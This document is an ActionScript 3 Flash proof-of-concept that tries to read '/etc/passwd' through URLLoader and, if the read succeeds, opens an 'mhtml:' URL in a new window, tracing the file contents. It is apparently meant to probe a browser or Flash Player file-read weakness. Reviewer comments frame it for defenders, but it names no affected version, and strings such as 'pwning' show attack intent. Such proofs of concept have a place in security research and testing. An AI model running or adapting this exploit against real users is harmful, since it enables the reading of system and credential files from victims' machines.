poc
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.*;
import flash.system.Security;
/**
 * Proof-of-concept sprite that exercises two URL operations in sequence:
 * a URLLoader fetch of the path "/etc/passwd" and, only if that fetch
 * completes, a navigateToURL() call to an "mhtml:" URL in a new window.
 *
 * What a defender should read from a run:
 *  - SECURITY_ERROR or IO_ERROR with no COMPLETE event means the player
 *    refused or failed the read.
 *  - A COMPLETE event whose data holds file contents means the read was
 *    permitted in the context the SWF ran in.
 *
 * NOTE(review): "/etc/passwd" is given as a relative URL, so what it
 * resolves to presumably depends on where the SWF is hosted (local
 * filesystem vs. a web origin). Confirm the hosting context before
 * interpreting a result.
 * NOTE(review): the page names no affected player version, platform or
 * advisory. Treat this as an unlabelled test case until that is confirmed.
 *
 * All results are reported through trace() only.
 */
public class URLRequestExample extends Sprite {
    private var loader:URLLoader;

    /**
     * Creates the loader, attaches every logging listener, then starts the
     * fetch. Synchronous errors thrown by load() are caught and traced.
     * Asynchronous outcomes arrive through the listeners.
     */
    public function URLRequestExample() {
        loader = new URLLoader();
        configureListeners(loader);
        var localPath:URLRequest = new URLRequest("/etc/passwd");
        try {
            loader.load(localPath);
        } catch (loadFailure:Error) {
            trace("Unable to load requested document." + loadFailure.toString());
        }
    }

    /**
     * Registers one handler per loader event so every outcome is traced,
     * including SECURITY_ERROR and IO_ERROR.
     *
     * @param dispatcher object to attach the listeners to
     */
    private function configureListeners(dispatcher:IEventDispatcher):void {
        // Event type / handler pairs, registered in this order.
        var bindings:Array = [
            [Event.COMPLETE, completeHandler],
            [Event.OPEN, openHandler],
            [ProgressEvent.PROGRESS, progressHandler],
            [SecurityErrorEvent.SECURITY_ERROR, securityErrorHandler],
            [HTTPStatusEvent.HTTP_STATUS, httpStatusHandler],
            [IOErrorEvent.IO_ERROR, ioErrorHandler]
        ];
        for (var i:int = 0; i < bindings.length; i++) {
            dispatcher.addEventListener(bindings[i][0], bindings[i][1]);
        }
    }

    /**
     * Runs only when the fetch finished successfully. Opens the "mhtml:"
     * URL in a new window, then traces whatever the loader received.
     * Reaching this handler at all is the signal to investigate.
     *
     * @param event COMPLETE event whose target is the URLLoader
     */
    private function completeHandler(event:Event):void {
        var finished:URLLoader = URLLoader(event.target);
        // Disabled by the author: an earlier attempt that loaded a policy
        // file from a file: URL. Kept for reference only.
        /*try {
        Security.loadPolicyFile("file://tmpfil");
        } catch (error:Error) {
        trace:("fuck" + error.toString());
        }
        */
        var followUp:URLRequest = new URLRequest("mhtml:/././tmp/pippo.html");
        try {
            navigateToURL(followUp, "_blank");
        } catch (navFailure:Error) {
            trace("Error occurred while pwning" + navFailure.toString());
        }
        trace("completeHandler: " + finished.data);
    }

    /** Traces the OPEN event dispatched by the loader. */
    private function openHandler(event:Event):void {
        var line:String = "openHandler: " + event;
        trace(line);
    }

    /** Traces the byte counts carried by each PROGRESS event. */
    private function progressHandler(event:ProgressEvent):void {
        var line:String = "progressHandler loaded:" + event.bytesLoaded;
        line = line + " total: " + event.bytesTotal;
        trace(line);
    }

    /** Traces the SECURITY_ERROR event, i.e. the player rejecting the load. */
    private function securityErrorHandler(event:SecurityErrorEvent):void {
        var line:String = "securityErrorHandler: " + event;
        trace(line);
    }

    /** Traces the HTTP_STATUS event reported for the load. */
    private function httpStatusHandler(event:HTTPStatusEvent):void {
        var line:String = "httpStatusHandler: " + event;
        trace(line);
    }

    /** Traces the IO_ERROR event, i.e. the load failing. */
    private function ioErrorHandler(event:IOErrorEvent):void {
        var line:String = "ioErrorHandler: " + event;
        trace(line);
    }
}
}